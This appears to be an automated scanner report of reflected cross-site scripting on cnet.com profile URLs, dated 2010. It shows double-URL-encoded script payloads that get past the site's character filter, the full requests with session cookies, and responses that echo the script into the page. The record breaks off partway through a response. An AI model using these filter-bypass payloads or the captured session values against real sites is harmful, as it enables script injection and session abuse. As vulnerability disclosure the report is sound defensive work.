The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 47f5a%253cscript%253ealert%25281%2529%253c%252fscript%253e847712e8a80 was submitted in the REST URL parameter 2. This input was echoed as 47f5a<script>alert(1)</script>847712e8a80 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/lindsey.turrentine47f5a%253cscript%253ealert%25281%2529%253c%252fscript%253e847712e8a80/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:12:45 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:12:46 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=998
Connection: Keep-Alive
Content-Length: 31121
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>lindsey.turrentine47f5a<script>alert(1)</script>847712e8a80's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7b1f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2833c3e717f was submitted in the REST URL parameter 2. This input was echoed as f7b1f"><script>alert(1)</script>2833c3e717f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/lindsey.turrentinef7b1f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2833c3e717f/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:12:44 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:12:45 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=992
Connection: Keep-Alive
Content-Length: 31226
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="lindsey.turrentinef7b1f"><script>alert(1)</script>2833c3e717f"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79343%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1ed5d5fb9b0 was submitted in the REST URL parameter 2. This input was echoed as 79343"><script>alert(1)</script>1ed5d5fb9b0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/mattfitzgerald--200879343%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1ed5d5fb9b0/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:13:26 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:13:26 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=993
Connection: Keep-Alive
Content-Length: 31185
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="mattfitzgerald--200879343"><script>alert(1)</script>1ed5d5fb9b0"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload eeaab%253cscript%253ealert%25281%2529%253c%252fscript%253e3826c1a0c2f was submitted in the REST URL parameter 2. This input was echoed as eeaab<script>alert(1)</script>3826c1a0c2f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/mattfitzgerald--2008eeaab%253cscript%253ealert%25281%2529%253c%252fscript%253e3826c1a0c2f/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:13:27 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:13:28 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=993
Connection: Keep-Alive
Content-Length: 31163
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>mattfitzgerald--2008eeaab<script>alert(1)</script>3826c1a0c2f's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d308a%253cscript%253ealert%25281%2529%253c%252fscript%253e5a7f798207 was submitted in the REST URL parameter 2. This input was echoed as d308a<script>alert(1)</script>5a7f798207 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/mbrookecd308a%253cscript%253ealert%25281%2529%253c%252fscript%253e5a7f798207/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:13:49 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:13:49 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=938
Connection: Keep-Alive
Content-Length: 31059
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>mbrookecd308a<script>alert(1)</script>5a7f798207's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61ca6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2784d3572aa was submitted in the REST URL parameter 2. This input was echoed as 61ca6"><script>alert(1)</script>2784d3572aa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/mbrookec61ca6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2784d3572aa/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:13:48 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:13:48 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=933
Connection: Keep-Alive
Content-Length: 31064
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="mbrookec61ca6"><script>alert(1)</script>2784d3572aa"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5ecc0%253cscript%253ealert%25281%2529%253c%252fscript%253e92bbe5ae8d2 was submitted in the REST URL parameter 2. This input was echoed as 5ecc0<script>alert(1)</script>92bbe5ae8d2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/meyersm5ecc0%253cscript%253ealert%25281%2529%253c%252fscript%253e92bbe5ae8d2/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:08:29 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:08:29 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=964
Connection: Keep-Alive
Content-Length: 31078
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>meyersm5ecc0<script>alert(1)</script>92bbe5ae8d2's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 537f5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9e74d93071d was submitted in the REST URL parameter 2. This input was echoed as 537f5"><script>alert(1)</script>9e74d93071d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/meyersm537f5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9e74d93071d/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:08:26 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:08:26 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=982
Connection: Keep-Alive
Content-Length: 31092
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="meyersm537f5"><script>alert(1)</script>9e74d93071d"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b54db%253cscript%253ealert%25281%2529%253c%252fscript%253e0e37451c9ed was submitted in the REST URL parameter 2. This input was echoed as b54db<script>alert(1)</script>0e37451c9ed in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/milappb54db%253cscript%253ealert%25281%2529%253c%252fscript%253e0e37451c9ed/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:14:38 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:14:38 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=943
Connection: Keep-Alive
Content-Length: 31008
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>milappb54db<script>alert(1)</script>0e37451c9ed's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1ef8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7854d2adf37 was submitted in the REST URL parameter 2. This input was echoed as b1ef8"><script>alert(1)</script>7854d2adf37 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/milappb1ef8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7854d2adf37/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:14:36 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:14:37 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=984
Connection: Keep-Alive
Content-Length: 31044
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="milappb1ef8"><script>alert(1)</script>7854d2adf37"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e8105%253cscript%253ealert%25281%2529%253c%252fscript%253e5f027d5a52e was submitted in the REST URL parameter 2. This input was echoed as e8105<script>alert(1)</script>5f027d5a52e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/mlamonicae8105%253cscript%253ealert%25281%2529%253c%252fscript%253e5f027d5a52e/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:08:36 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:08:36 GMT
Edge-Control: no-cache
